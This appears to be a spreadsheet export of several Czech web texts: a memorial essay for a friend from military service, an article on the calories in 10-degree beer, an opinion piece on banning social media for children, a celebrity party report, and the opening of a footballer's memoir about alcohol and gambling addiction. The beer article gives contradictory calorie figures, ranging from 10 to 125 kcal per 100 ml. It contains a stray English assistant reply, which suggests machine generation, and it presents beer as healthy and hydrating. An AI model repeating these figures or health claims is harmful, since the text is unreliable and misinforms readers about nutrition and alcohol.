zakryl i to, co souviselo se zradou na českém národě. Harry Ruksak se dále propracovával na západ a jednoho dne došel i do Sokolova na vrátnici ČSAD , nechal si mě vrátným vyvolat. Tak jsme zase byli jako trojlístek kompletní. Sehnal jsem mu tam zaměstnání jako závozník. ČSAD omožnilo později svým závozníkům udělat si v podniku řidičský průkaz na nákladní auta a Harry začal po okrese rozvážet mléko i jiné. Pro začátek bydlel se mnou u nás doma. Často jsme chodili za třetím z trojlístku Mirkem Pickou a společně jsme navštěvovali hostinec Střelák. xx Harry, ty můj nejlepší kamaráde, a najednou jsi v urně Narazili jsme na sebe na vojně 1958. Tam jsme ještě s Mirkem Pickou utvořili nerozlučný trojlístek. Když jsi po mnoha letech jako už emigrant, který zůstal u své maminky, která jako sudetská Němka uprchla z Teplic s polovinou svých dětí do Německa a ty s druhou polovinou svých sourozenců jste zůstali u svého českého táty, přijeli se ženou Evou na naši chalupu mezi Domažlicemi a Plzní, poznala moje rodina, proč tě považuji za svého nejlepšího kamaráda. V tamější vesnické hospůdce jsme všichni zasedli a ty jsi v jednom kuse přiváděl celou hospodu k hlasitému smíchu svými špruchy. Smíchy se nám mnohým draly do očí slzy. Uměl jsi k smíchu přivést jak malé dítě, tak člověka před jeho úmrtím. Uměl jsi si dělat legraci sám ze sebe a nikdy jsi nikoho neurazil. Naše velké přátelství trojlístku z vojny pokračovalo i v civilu. V Německu jsi po čase zůstal u maminky. Začal ses tam živit jako řidič, což bez znalosti německého jazyka bylo možné. Poznal jsi tam svou budoucí ženu Evu, emigrantku pocházející z Litoměřic . Narodila se vám dcera Helena a po ní syn Roman. Dostal jsem možnost vás tam navštívit se svou dcerou Ivou v době, kdy zemřel Elvis a komunisté ještě vládli v Československu . I já později před nimi prchl a emigroval, za dva roky poté se to povedlo i mým dcerám Ivě a Petře, když dostaly možnost mě navštívit. Po skončení vlády komunistů jsem se po rozvodu s českou ženou, oženil s jinou českou dámou Bohdanou. Koupili jsme onu chalupu, kam jste, Harry, se ženou často jezdili a také Mirek Picka, aby náš trojlístek mohl pokračovat ve svých rejích. Byla to hodně veselá setkání hlavně díky tobě. Celá naše hodně rozvětvená rodina tě milovala, byl jsi jeden z nás. Dokázal jsi naše vesnické sousedy přivádět do varu svými průpovídkami. Na té chalupě se oslavovalo kdeco. Hráli jsme tam fotbal i pingpong a i při nich jsi nás dokázal přivádět k smíchu. Po 28 letech jsme chalupu prodali, zestárli jsme, už jsme nestačili na její údržbu. Také ti kolem nás zestárli a už jsme často na chalupě byli s Bohdankou sami. To nastali chvíle, kdy my dva jsme si skoro denně telefonovali. Několikrát jsme za vámi do skoro 300 kilometrů vzdálené Karlsruhe zajeli. S telefonováním jsme pokračovali. Stáří se na nás začalo podepisovat, hlavně na tobě, který oproti mě kouřil, miloval alkohol a tučná jídla. Oproti mně jsi se také málo pohyboval. Nastala doba, kdy jsi dokázal chodit jen při držení se onoho invalidního vozíku. Měl jsi problém jezdit autem. U tvé ženy se začal usazovat ALZHEIMER. V Sokolově nám z trojlístku zemřel Mirek Picka, jel jsem se s ním rozloučit společně s jeho rodinou. Předtím mu zemřela jeho žena Bohunka. Pak u tebe objevili nádor na tlustém střevě i rakovinu žaludku a jater. Dostal jsi vývody a do telefonu mi řekl, že nejraději by ses už nechtěl probudit. Střídavě jsi byl v nemocnici a doma. Na nemocniční telefon jsem se ti po čase nemohl dovolat, svůj starý mobil jsi neuměl obsluhovat, jen přijímat hovory a volat. Když jsem volal na vaši pevnou linku a brala to tvá žena, mluvila už z cesty a nedokázala mi o tobě nic říct. Jednou se mi povedlo, že jsi mobil vzal, mluvil jsi těžce, špatně jsem ti rozuměl. Škoda, že jste neměli doma internet a chytré mobily a tím mohly být naše kontakty bližší. Pak nám jednou zvonila doma pevná linka, neozval se ale hlas tvůj ani hlas tvé ženy, ale hlas vašeho syna Romana: „Horste, táta teď zemřel,“ vytryskly mi do očí slzy, i když jsem doufal, že je to zase jen jeden z tvých šprýmů. Bylo 28. 09. 2024. Až prý 30. 10. 24 máš pohřeb. Pojedeme se s tebou rozloučit ve velkém množství. V den tvého pohřbu jsem poprvé viděl tvou dceru Helenu a syna Romana v oné kapličce na hřbitově. Mámu Evu pro její nemoc nechali raději doma. Pak tě v urně nesli k hrobu rodičů tvé ženy. Tam tě v urně nacpali do vyhrabané díry. Dostali jsme možnost na tvou urnu v zemi hodit lopatkou hlínu. Když jsem se objímal s vašimi dětmi, měl jsem prvně v životě přiškrcený hlas a skoro nedokázal mluvit. Je mi hodně smutno, a to bude trvat také hodně dlouho, možná také věčně. Škoda, že se do uren nedá aspoň telefonovat, bylo by to o něco méně smutné... Mirek Picka se ženou Bohunkou Trojlístek v SEMOŠICKÉ hospodě Harry se snaží rozumět svému starému mobilu za asistence Jakuba Harry a moje sestra Hilda Harry zkoumá hladinu rychnovského rybníčku po usazení se u nás doma v mém pokoji Trojlísstek opět pohromadě po vojně Trojlístek na chalupě delší dobu po vojně Harry s dcerou Mirka a Bohunky u nich na zahradě. Janička se nebála strejdy Harryho ani jeho sekery Harry a Mirek v tepluškách jako tankisté Kdysi na chalupě Harry nás v rozestavěné garáži na chalupě baví zpěvem Harry labužník Na chalupě. Vlevo Pepík Havel ze Sokolova , který byl také jako my na vojně ve Znojmě . Byl to ten, který se často pral mimo kasárna při odchodu z kasáren na černo. Naše první setkání po Harryho emigraci v Karlsruhe . Já se tenkrát ještě s dcerou Ivou vrátil zpět, bylo to v době kdy zemřel Elvis. Autor: Horst Anton Haslbauer Autor Horst Anton Haslbauer</t>
  </si>
  <si>
    <t>27640</t>
  </si>
  <si>
    <t>20241201_116_3476884745_4865f84a92144d33b23f.html</t>
  </si>
  <si>
    <t>4865f84a92144d33b23f</t>
  </si>
  <si>
    <t>10° pivo: Kolik kalori skrývá oblíbený mok?</t>
  </si>
  <si>
    <t>10° pivo : Kolik kalori skrývá oblíbený mok? Obsah článku: Co je to 10° pivo ? Kalorie v pivu : základní fakta Kalorie v 10° pivu (na 100 ml) Porovnání s jinými druhy piva Mýty o kaloriích v pivu Vliv piva na váhu Tipy pro konzumaci piva s ohledem na kalorie Co je to 10° pivo ? Desítka, jak se tomuto pivu s láskou přezdívá, je skvělou volbou pro ty, kteří si chtějí vychutnat osvěžující chuť piva , ale zároveň dbají na svůj kalorický příjem. S nižším obsahem alkoholu , obvykle kolem 4 %, a méně kaloriemi než silnější piva , je desítka ideálním společníkem pro teplé letní dny, sportovní utkání nebo posezení s přáteli. Kalorický obsah desetistupňového piva se pohybuje okolo 120 kJ na 100 ml, což je srovnatelné s některými nealkoholickými nápoji. Díky tomu si můžete dopřát lahodnou sklenici piva bez zbytečných výčitek a užít si osvěžení a příjemnou chuť. Navíc, pivo s nižším obsahem alkoholu , jako je desítka, je lépe stravitelné a nezpůsobuje takovou únavu. Kalorie v pivu : základní fakta Desítka, oblíbený mok mnoha Čechů, se může pyšnit i nízkým počtem kalorií. Zatímco kalorický obsah 10 stupňového piva se může lišit v závislosti na výrobci a použitém receptu, obecně platí, že se pohybuje okolo 30-35 kcal na 100 ml. To znamená, že sklenice o objemu 0,5 l obsahuje přibližně 150-175 kcal. Pro srovnání, stejné množství slazené limonády obsahuje až dvojnásobek kalorií. Kalorický obsah piva Kalorie na 100 ml 10° pivo 125 kcal 12° pivo 150 kcal Pivo s nižším obsahem alkoholu , jako je právě desítka, tak může být vhodnou volbou pro ty, kteří si hlídají kalorický příjem a zároveň si chtějí dopřát osvěžující nápoj. Samozřejmě, klíčem k udržení zdravého životního stylu je vždy střídmost a vyvážená strava. Kalorie v 10° pivu (na 100 ml) Desítka, oblíbené pivo mnoha Čechů, si může udržet své místo i v rámci zdravého životního stylu. S kalorickým obsahem pohybujícím se okolo 130 kJ na 100 ml, tedy zhruba 31 kcal, představuje desítka osvěžující nápoj s nižším obsahem kalorií než mnohé slazené limonády či džusy. Užívat si ho tak můžete s klidem i při dodržování pitného režimu, ať už po sportu, nebo během horkých letních dnů. Pivo je navíc zdrojem vitamínů skupiny B a minerálů, jako je draslík a hořčík. Pamatujte však, že klíčem k vyváženému životnímu stylu je umírněnost. Porovnání s jinými druhy piva Desítka s pouhými 10 kaloriemi na 100 ml představuje skvělou volbu pro ty, kteří si hlídají kalorický příjem, ale zároveň si chtějí dopřát osvěžující pivo . Pro srovnání, běžné světlé ležáky mívají kalorickou hodnotu okolo 40 kcal/100 ml, zatímco silnější piva , jako jsou IPY, se pohybují i nad 60 kcal/100 ml. Volbou desítky tak můžete ušetřit značné množství kalorií, aniž byste se museli vzdát chuti piva . Například, pokud si dáte půllitr desítky namísto běžného ležáku, ušetříte zhruba 140 kcal. To už je kalorický ekvivalent menšího dezertu! Desítka je tak skvělým partnerem pro aktivní životní styl, kdy si chcete dopřát osvěžení bez zbytečných výčitek. Mnoho lidí si volbou desítky s nižším obsahem kalorií dokázalo udržet váhu, nebo dokonce zhubnout, aniž by se museli vzdát svého oblíbeného nápoje. Mýty o kaloriích v pivu Desítka, to je klasika, která v Česku boduje na plné čáře. A co teprve kalorie v pivu ? I tady desítka překvapí. S kalorickým obsahem okolo 120 kJ na 100 ml je desítka lehčí než džus nebo slazené limonády. Takže si tuhle osvěžující pochoutku můžete dopřát s klidem a bez výčitek. Pivo je zkrátka skvělým parťákem pro chvíle relaxace a pohody. Ať už si ho vychutnáváte s přáteli nebo jen tak pro sebe, nezapomeňte, že všeho s mírou. A s desítkou to platí dvojnásob. Nejenže si pochutnáte, ale ještě podpoříte pitný režim. Tak na zdraví! Vliv piva na váhu Desítka, to je klasika českých hospod a symbol osvěžení. S pouhými 10 stupni a nízkým obsahem kalorií, zhruba 40 kcal na 100 ml, je ideální volbou pro ty, kteří si hlídají linii, ale zároveň si chtějí dopřát lahodný zlatavý mok. Pivo s 10 stupni obsahuje méně alkoholu a kalorií než víno nebo sladké limonády, a přitom nabízí osvěžení a relaxaci. Navíc obsahuje vitamíny skupiny B a minerály, které prospívají našemu zdraví. Důležité je pít pivo s mírou a zodpovědně. V kombinaci s aktivním životním stylem a vyváženou stravou si tak můžete vychutnat osvěžující pivo bez obav o svou postavu. Pamatujte, že klíčem k udržení zdravé váhy je vyvážený životní styl a střídmost ve všech oblastech. Tipy pro konzumaci piva s ohledem na kalorie I understand. Here's the text for the article "Tipy pro konzumaci piva s ohledem na kalorie," focusing on the positive aspects of enjoying 10° beer while being mindful of calorie intake: Desítka, to je klasika, která v Česku nikdy neomrzí. S kalorickým obsahem okolo 40 kcal na 100 ml je to osvěžující volba, která se dá pít s klidem i s ohledem na linii. Jak si ale užít desítku naplno a nepřibrat? Zaměřte se na kvalitu, ne kvantitu. Dejte si sklenici poctivé desítky z minipivovaru a vychutnejte si její chuť do posledního doušku. Nejde o to vypít co nejvíc, ale užít si každý lok. Skvěle se hodí i k aktivnímu životnímu stylu. Po cyklistickém výletě nebo turistice v přírodě přijde osvěžující desítka vhod a příjemně doplní tekutiny. Nezapomeňte, že důležitá je vyvážená strava a dostatek pohybu. Pokud si hlídáte kalorie, zařaďte pivo do svého jídelníčku s rozumem a užijte si ho bez výčitek. Ať už si vychutnáváte osvěžující desítku po práci nebo s přáteli o víkendu, pamatujte, že klíčem je umírněnost. S kalorickým obsahem okolo 30 kcal na 100 ml pro 10° pivo si tento lahodný nápoj můžete dopřát bez výčitek, pokud ho budete konzumovat s rozumem. Zařaďte ho do vyvážené stravy a aktivního životního stylu a užijte si jeho osvěžující chuť bez zbytečných starostí. Pivo s mírou může být i součástí zdravého životního stylu. Inspirujte se příklady lidí, kteří si dopřávají pivo zodpovědně a zároveň dbají o své zdraví a kondici. Nejde o to si odpírat, ale o to najít rovnováhu a užívat si život plnými doušky, včetně občasného oroseného půllitru. Publikováno: 01. 12. 2024</t>
  </si>
  <si>
    <t>31</t>
  </si>
  <si>
    <t>1</t>
  </si>
  <si>
    <t>20241201_117_3476900273_6d85921a656736526811.html</t>
  </si>
  <si>
    <t>6d85921a656736526811</t>
  </si>
  <si>
    <t>Moje milé dítě, vypneme vám sítě</t>
  </si>
  <si>
    <t>Moje milé dítě, vypneme vám sítě Austrálie v týdnu učinila významný krok: zakázala používání sítí dětem mladším 16 let. Společnosti provozující platformy mají na zavedení opatření rok. Porušování bude přísně sankcionováno. V průběhu týdne prošla zpráva o zákazu sociálních sítí v Austrálii zcela nenápadně. V naší zemi, kde jsme si zvykli na svobodu takřka bez hranic, to moc nadšené ohlasy nevyvolalo. Proč to řeší stát a ne rodiče? Proč to musí řešit provozovatelé sítí? Sama k tomu říkám: tleskám a včera bylo pozdě. Konečně našel někdo odvahu závislost dětí na sítích řešit. Závislí jsme všichni, ale… Ať si to přiznáme, nebo ne, závislí jsme v určité míře všichni. Nedávno jsem psala malý anketní dotaz na Bluesky, kdy naposledy jsme se od mobilu vzdálili na delší dobu více než 100 metrů. Pokud vynecháme plavání nebo anestezii. Opravdu jen pár jedinců občas pracuje na zahradě, sportuje nebo jde do přírody bez mobilu. Máme tam přece hodinky, krokoměry, předpovědi počasí. A taky musíme kontrolovat, kolik lajků jsme dostali na tuhle fotku, tenhle příspěvek a ostře odpovědět nějakému zcela cizímu člověku. Přiznává se nám to špatně, ale závislí jsme. Někdo to řeší občasným detoxem, někdo si nastavuje režim nerušit . A většina se tváří, že má sítě pod kontrolou. Jenže my jsme dospělí a vyrostli jsme v době bez sociálních sítí. Naše hodnoty, chování, fyzická zátěž byly formované bez mobilu v ruce. A hlavně, náš mozek se formoval přirozeným vnímáním světa. Ano, starší generace láteřily, že trávíme příliš času u TV, nebo posloucháme hlasitou hudbu, jenže nic z toho nebylo interaktivní. Naše současné závislosti tak můžeme aspoň nějak kontrolovat, protože jsme už dospělí a mozek máme naprogramovaný i přirozenějšími aktivitami. A co děti? U dětí je to jinak. Samozřejmě je to individuální, rodina se liší od rodiny. Někomu v batolecím věku strčí mobil, tu máš, hrej si. Dítě je hodné, nevyžaduje tolik pozornosti. Od nástupu do školy je mobil nezbytnost organizační, s blížící se pubertou záležitost statusová. A tady je ten průšvih. Většina platforem má nějaký nastavený věkový limit, ale už předškolní děti jej snadno obejdou. Covid užívání sítí znásobil, když děti, ty české snad nejdéle v Evropě , byly nuceně zavřeny skoro dva roky doma. Sociální sítě používají děti aktivně od nástupu do školy. Jenže ještě nemají vyzrálý mozek. Dopamin, který prokazatelně užívání sociálních sítí pomáhá tvořit, je silně návykový a nezralý mozek nemá šanci mít situaci pod kontrolou. Navíc je už prokázané, že jednostranná aktivita a závislost na dopaminu mění strukturu dětského mozku. Naléváte dětem vodku? Proč by měly být závislé na dopaminu? Dnes je populární láteřit nad užíváním alkoholu . Je ostuda, že je brán stále jako společenská norma, je to legální droga. Jenže alkohol , nikotin, a teď už i energetické nápoje máme jasně regulované legislativou a podávání dětem je mimo zákon. Mezitím nám tu vesele roste generace dětí závislých na sociálních sítích. Učitelé, odborníci z pedagogicko-psychologických poraden i adiktologové varují, tohle je časovaná bomba. Ano, před školami už děti nekřičí, o přestávkách neběhají po chodbách a v parku nedělají vylomeniny. Jsou shrbené, apatické, čekají na lajky, selfie, storýčka, reelsy. Další dopamin, ještě, ještě, teď mě neruš. Někteří odborníci srovnávají závislost na dopaminu u dětí se závislostí na heroinu. Do toho žijeme v zemi, kde sehnat dětského psychologa, natož psychiatra, nezvládne ani Chuck Norris . Regulace? Včera bylo pozdě Mí potomci by mě nepochválili, ale znají můj výchovný motiv: dělám to pro tvoje dobro. Ve vlastním zájmu bychom se k legislativní regulaci sociálních sítí měli přidat co nejdříve. Jakkoliv to vypadá nepopulárně. Všichni jsme sledovali nedávné US volby. Dnes nevyhrávají volby programy a fakta. Dnes je vyhrává dosah na sociálních sítích. Chceme mít z vlastních dětí sebevědomé občany s životem pod kontrolou? Nebo nám vystačí, že jsou „hodné“ a necháme z nich vyrůst závislé frustrované jedince? Takoví jsou totiž vysněný materiál pro diktátory. https://www.novinky.cz/clanek/domaci-bez-mobilu-ani-ranu-zavislych-deti-skokove-pribylo-lekari-biji-na-poplach-40442853</t>
  </si>
  <si>
    <t>20241201_118_3476814013_4fa55f864dd185db1fa0.html</t>
  </si>
  <si>
    <t>4fa55f864dd185db1fa0</t>
  </si>
  <si>
    <t>Jak zlepšit prodejnost piva</t>
  </si>
  <si>
    <t>20241201_119_3476783766_760f6cfdbbe49fa82d07.html</t>
  </si>
  <si>
    <t>760f6cfdbbe49fa82d07</t>
  </si>
  <si>
    <t>Tohle jste v TV vidět nemohli: Na mejdanu po Slavících největší pařmenka Monika Absolonová, hádka Jágra s přítelkyní a pepřový sprej !</t>
  </si>
  <si>
    <t>Tohle jste v TV vidět nemohli: Na mejdanu po Slavících největší pařmenka Monika Absolonová , hádka Jágra s přítelkyní a pepřový sprej ! Po slavnostním večeru Českého slavíka, který se konal ve Fóru Karlín , se nejen ocenění, ale i další hosté přesunuli na oficiální afterparty. Ta však nebyla jediným místem, kde se slavilo. Někteří účastníci se rozhodli pokračovat v oslavách na neoficiálních večírcích, kde se atmosféra uvolnila ještě více. Jednou z nejvýraznějších osobností večera byla zpěvačka Monika Absolonová , která si večer užila naplno a stala se doslova královnou parketu.Monika Absolonová , která letos získala bronzové ocenění v anketě popularity, měla důvod k radosti. Po oficiální části večera se svou skupinkou přátel zamířila do blízkého baru, kde se místo sektu podávalo pivo a hlavní zábavou byl tanec. Absolonová svým nadšením strhla i další známé tváře, jako například moderátora Leoše Mareše , zpěváka Michala Davida nebo herce Aleše Hámu . Autor: A S Rubrika transition_slide Uncategorized</t>
  </si>
  <si>
    <t>19280</t>
  </si>
  <si>
    <t>29380</t>
  </si>
  <si>
    <t>20241201_12_3486762666_e0c02a44593f2563f3c0.html</t>
  </si>
  <si>
    <t>e0c02a44593f2563f3c0</t>
  </si>
  <si>
    <t>To se nějak udělá</t>
  </si>
  <si>
    <t>To se nějak udělá Zbyněk Pospěch Šestnáct piv , asi dvacet panáků, čtyři góly v ligovém zápase. Stihnul jsem to všechno během jediného dne. V tomhle pořadí, i když první dvě položky na seznamu se tedy trochu navzájem prolnuly. Nad ránem jsem se vypotácel z baru, celé dopoledne, než jsem musel na sraz týmu, jsem prochrápal na pokoji, a potom jsem tam Olomouci nasypal ty čtyři kusy. Úplný úlet. Jediný hráč v historii české ligy jich dokázal dát za zápas víc, David Lafata . Pak už je tam několik nás čtyřgólových. Je to výjimečná událost, jaká se málokomu povede aspoň jednou za kariéru i na nižší úrovni, natož v lize. A já, když se nad tím dnem dneska zamyslím, víc než radost cítím stud. Stydím se za to, jak jsem žil. Tenkrát v Dukle už to bylo fakt špatné období. Zažíval jsem jednu ze svých nejpovedenějších sezon, pral se o korunu krále střelců, a přitom byl úplně na dně. Ve sračkách. Bez peněz, zato s milionovými dluhy. Věčně nalitý, spoluhráči mě každou chvíli sbírali někde v nonstopu cestou na trénink. Navenek jsem zároveň dál na sílu držel masku borce, který má všechno pod kontrolou. Frajera, který je nad věcí, všechno dělá nejlíp, daří se mu. Problém? Neznám. Slabá místa? Nemám. Všechno se nějak vyřeší, že? Jakoukoliv nepříjemnost jsem vždycky schovával za dojem, že se nic neděje, a doufal, že to nikdo nezjistí. Že neodhalí, jak to se mnou opravdu je. Arogantní, namistrovaný, neohrožený. Působil jsem tak pro svoje okolí ještě i ve chvíli, kdy jsem na podzim 2021 sednul na vlak do Prahy s tím, že si konečně nechám pomoct a nastoupím na léčení do Bohnic . Je to tak, do Bohnic . Tohle o mně doteď vědělo jenom pár lidí. Jenom nejužší rodina a moje tehdejší přítelkyně, kvůli níž jsem snad poprvé v životě upozadil svoje ego a k tomuhle rozhodnutí se dokopal. Všem, včetně svého zaměstnavatele, jsem totiž zase nakecal něco jiného. Vymyslel jsem si, že jdu na operaci s vyhřezlou plotýnkou. Dokázal jsem přesvědčit i doktorku, aby mi napsala zdravotní pauzu dostatečně nekonkrétně, a já tak mohl všechny ochcat. Ten borec Pospěch přece nebude někomu přiznávat, že se jde léčit, protože nezvládá chlast , víš jak. Zase, tak jako tolikrát v životě, mi to vyšlo. Zase mi všichni uvěřili. I příšerný pocit, že tohle nemám zapotřebí a já přece nejsem taková troska, abych lezl do Bohnic , jsem si schoval jenom pro sebe a nikomu o něm neříkal. Hodinu jsem seděl před vraty léčebny a přemýšlel, jestli do toho fakt jdu, než jsem se zvednul a prostě těmi dveřmi prošel. Prošel jsem jimi s tím, že mi prospěje zůstat tam tři měsíce bez alkoholu a ukážu svojí holce, aby to se mnou nevzdávala, načež jsem se rychle dozvěděl, že můj největší problém spočívá v něčem trochu jiném. Jsem gambler. A zdaleka ne jenom tím klasickým způsobem, jaký si kdekdo představí. Já gemblím se životem. Hraju hru sám se sebou a s okolím. Hru plnou bludů a iluzí. V tu chvíli jako by mi všechno naplno došlo. No jo. To jsem já. O tom je celá moje story. To jsou všechny ty průsery, nesmysly a konflikty, které jsem vždycky přitahoval. Měl jsem dostat přes držku. Moc by mi to prospělo. Tolikrát jsem přes ni měl dostat, abych si uvědomil, co už je za čarou a co nesmím dělat. Jenže nebylo, kdo by mi přes ni dal. Táta měl problémy s chlastem a odešel od nás, když mi bylo nějakých osm. Nebyl mi vzorem, choval se hrubě i k mámě. Mě vychovával fotbal. Ale autority? S těmi jsem měl problém. Pár lidí, kteří se ke mně chovali slušně, jsem respektoval, ale jak měl někdo potřebu mi ukazovat, že je něco víc, šel jsem proti němu, víš jak. Rebel. Samorost. Neměl jsem vzor, který by mi ukázal, že občas je dobré být trochu diplomat a soustředit se na sebe. Chyběla mi pokora. I proto, že ve sportu mi odjakživa šlo, na co jsem sáhnul. Chtěl jsem hrát hokej jako brácha, ale máma mě směřovala spíš směrem fotbalu, tak jsem se nadchnul pro něj. A to tak, že mě pak musela klidně v deset večer tahat ze hřiště, spal jsem s balonem a kopačkama v posteli. Nevnímal jsem svět, jenom trávník a balon. Trenéři v mládeži na mě často něco měli, ve starších kategoriích mi vyčítali chybějící rychlost a vadily jim i průšvihy, do kterých jsem byl zákonitě vždycky namočený, nebo moje tlama, která si vždycky musela něco říct. Ale stejně jsem vždycky nakonec hrál, protože jsem byl prostě nejlepší. Vysoký namistrovaný blonďák, všechno mi šlo. Co mi kdo má co vykládat, že? Nedostal jsem po držce. Tehdy ani nikdy jindy. Proplouval jsem. Mladším i starším dorostem, kdy už spousta šikovných kluků odpadávala, protože se prostě nedostali do týmu, jsem já dál proplouval a střílel góly, než jsem si na konci poslední dorostenecké sezony udělal vazy a najednou nevěděl, co bude. Nikdo za mnou nepřišel, nikdo mi neporadil. Určitě i proto, jaký jsem byl parchant, víš jak. A tak jsem si na vedení opavského klubu došel sám, načež mi tam ředitel Jakubek začal vysvětlovat, že mi nemůžou dát profesionální smlouvu, když jsem zraněný a kdesi cosi. Chtěl jsem se na místě rozbrečet, protože jsem netušil, co se mnou teda bude, když jediné, co jsem odmalička znal, byl fotbal. Bylo mi to celé strašně líto. Ale místo toho najednou, nevím, co mi to problesklo hlavou, říkám: „Okej, mně je to jedno, stejně mě chce Baník Ostrava .“ Absolutně to nebyla pravda, stačil by jeden telefon tam na místě, aby se zjistilo, že kecám. Ten Jakubek se ale místo toho podíval na sekretáře, ať mu přinese tady pro Zbyňka smlouvu. Na místě jsem ji podepsal a byl spokojený, jak jsem ho převezl. Z nasrání jsem si vymyslel tuhle hovadinu a najednou odcházel s profesionální smlouvou na – tuším – dva roky a deset tisíc korun měsíčně. Normálně mi to prošlo, zase jsem proplul. Koleno jsem si dal dohromady, chytnul se v áčku a v devatenácti začal hrát stabilně ligu. Jen jsem zaboha nemohl přes všechny šance dát gól. Jako dneska si tak pamatuju, jak jsem si doma proti Drnovicím v důležitém zápase o záchranu za stavu 1:0 vzal penaltu, když se k ní nikdo neměl. A samozřejmě mi ji gólman Kollár vyrazil, že. Od starých jsem pak dostal ceres, co si to dovoluju, fracek mladý. Jenže my nakonec vyhráli, takže se to zase nějak přešlo. Zase jsem z toho vyklouznul. Nakonec jsme tu sezonu spadli, což bylo ve finále ideální, protože následná druholigová sezona pod novým trenérem Karlem Jarůškem byla perfektní. Vyhrávali jsme, v Opavě byla euforie. A když přišel na hostování Petr Švancara , dal tomu ten pravý náboj. Vyhověli jsme si báječně, stala se z nás nejlepší útočná dvojice soutěže. Já jako beranidlo soupeřových obran, Švanci technik, který těžil z volnějšího prostoru. Pořád jsme vyhrávali a připadali si jako králové Opavy . Tenkrát byla ve městě spousta hospod, všude plno a lidi nás poznávali, zvali na pivo , letěly na nás holky. A to bylo něco pro mě. Já vůbec neřešil, co bude. Pro mě existovalo jenom teď a tady. Užíval jsem si všechny radosti, které život fotbalisty přinášel. Od chvíle, co mě mazáci v dorostu vzali mezi sebe a já se od nich naučil pít a hrát karty nebo kostky, pro mě tohle představovalo správnou týmovou zábavu. Pivo a gembl. Vydělal jsem deset tisíc a utratil třicet a bylo mi to jedno, protože přece postoupíme a budou prémie, že? Takže jsem přišel za jedním spoluhráčem, pak za druhým, jestli mi něco nepůjčí, že mu to vrátím, až budou prachy. Neřešil jsem, kde vezmu na spoustu věcí, že bych si měl něco někam odkládat, šetřit. Bydlel jsem u mámy a neplatil ani daně, zdrávko, socko… Proč taky? Žil jsem okamžikem. Nedíval jsem se, co bude za měsíc ani za týden. Mě zajímalo, jestli budu mít za co jít večer pařit. Připadal jsem si jako tak dobrý fotbalista, takový talent, že jednou podepíšu někde obrovskou smlouvu ve velkém klubu a budu mít vystaráno, ta mě zabezpečí a smáznu z ní všechny tyhle malé dluhy. Vůbec jsem neznal a neuvědomoval si hodnotu peněz. Pro mě to byly jen směnky za zážitky. Nikdo mi ani neřekl, že by to mělo být jinak. A i kdyby jo, stejně bych ho neposlouchal. Proč taky, že? Připadal jsem si jako středobod světa. Rozhodně jako toho světa, který jsem znal a který se točil kolem fotbalového stadionu a ruchu noční Opavy . Nebyl jsem jediný den doma, venku se pořád něco dělo. Byl jsem Pospěch . Byl jsem někdo. Mistr světa, všichni se ze mě poserte. „Hraj fotbal a neřeš, všechno půjde,“ slýchal jsem celé roky. Tak jsem to tak dělal, že. Hrál jsem fotbal, nic neřešil a vždycky všechno někdo vyřešil za mě, nebo mi to nějak prošlo. Jako když mi hrozila vojna, což by bylo něco pro moji povahu, nechat na sebe řvát nějaké gumy, víš jak. Už na odvodu mě nějaký borec s milionem visaček na uniformě jebal, jak si to dovoluju tam stát a že tady nejsem na diskotéce. Tenkrát jsem ještě nosil dlouhé vlasy a děsil jsem se pomyšlení, že by mi na ně někdo sáhnul. Ty vole, tady tohle nedám, bylo mi jasné. A zase se to nějak udělalo. Na klubu věděli, jak zařídit, aby se můj povolávák schoval do šuplíku a můj nástup se o rok oddálil. Mezitím povinná vojna skončila. Nedostal jsem přes držku. Dostal jsem další potvrzení, že jsem ten nedotknutelný fotbalista. Ono už na základce, kde jsme byli fotbalová třída, samí kluci bez bab, jsme dělali neskutečný bordel. Jenže ředitel chodil fandit, tak nám vždycky sice pohrozili, ale všechno nám nakonec prošlo. Já navíc nejsem úplně blbej, že, takže jsem se ani nepotřeboval učit, abych měl samé jedničky. I proto jsem se dostal na střední na obchodku a dokud jsem tam chodil, prolejzal jsem v pohodě s individuálním plánem. Jenže jak mě vzali do áčka, ve škole jsem se ukazoval čím dál míň a už ve třeťáku jsem měl přes pět set zameškaných hodin, protože se mi tam prostě chodit už nechtělo. Nepotřebuju nějakou školu, když rostu pro velký fotbal, víš jak. Jenže nakonec mě ještě se spolužákem hokejistou nepustili k maturitě, protože nás za ty čtyři roky skoro ani neznali. Pro mamku ale tohle byla věc, na které trvala. Hustila do mě, že maturitu si prostě dodělám. Byl to zrovna ten rok, kdy jsme váleli ve druhé lize, tak mi Karel Jarůšek zařídil, že přejdu do Brna do ELDA, kde už spousta fotbalistů a hokejistů maturity udělala. Že se to nějak zařídí. I mamce jsem opakoval: „Neřeš, to se zvládne.“ V Brně jsem se musel aspoň párkrát ukázat, ale že bych ty výlety pojal studijně, to se zrovna říct nedá. Protože jako jsem si myslel, že mně patřila Opava , Brno bylo Švanciho. Ve škole jsem se tak maximálně zaregistroval, dostal nějaké papíry, ale daleko víc jsem poznal brněnské bary. Všechny ty Tabariny a Mandariny, že, kde mi Švanci teprve ukázal, o čem je život a jak se žije v Brně , když máš peníze. Peťa Vašek, náš tehdejší gólman, mi často říkává, že jsem udělal největší chybu, že jsem se tehdy Švanciho chytil. Prý kdybych zůstal svůj, dotáhnul jsem to daleko dál než on. Jenže já ke Švancimu vzhlížel, rozuměli jsme si. Oba jsme si užívali pocit, že jsme někdo. Mně se navíc líbilo, jak chodil mačkat automaty. Brnkoleto tomu říkával. Jdeme na brnkoleto… A k tomu samozřejmě chlast , holky. Brno nabízí větší možnosti než Opava , po všech směrech. Neuměl jsem říct „ne“ na cokoliv, co Švanci navrhnul. Do toho se na ELDU blížily maturity. Na klasický termín jsem nešel, rovnou jsem se soustředil na ten opravný. Karel Jarůšek mi jen pořád opakoval, ať se hlavně naučím. „Jo, jo,“ já na to. Víš jak. To se samozřejmě nějak udělá. Já přece rozhodně nebudu ležet v nějakým učení. Dopadlo to tak, že jednou chlastáme a nad ránem sedíme na automatech s kamarádem Lukášem Černínem , který taky tehdy za Opavu hrával a byl to bohémek jako já. Asi v pět mu říkám: „Ty vole, Čefon, já musím na maturitu.“ A on: „Cože?“ „No ty vole, já jsem si uvědomil, já musím do Brna . Mám dneska maturitu. Jsem úplně zapomněl.“ Mám pocit, že jsem se totiž tou dobou podíval na mobil a měl tam od někoho zprávu. Možná zrovna od toho Karla , který mi opakoval, že se na to nesmím vykašlat. „Ty vole, já musím jet.“ Čefon na mě, jestli jsem se neposral, že jsem ožralý. „Jak tam chceš jet? A co tam budeš v tomhle stavu dělat?“ „Nevím, vole, ale musím, bohužel. To už je opravný termín, jestli tam nedojedu, Jarůšek mě zabije.“ Mě vůbec nezajímalo, co se může 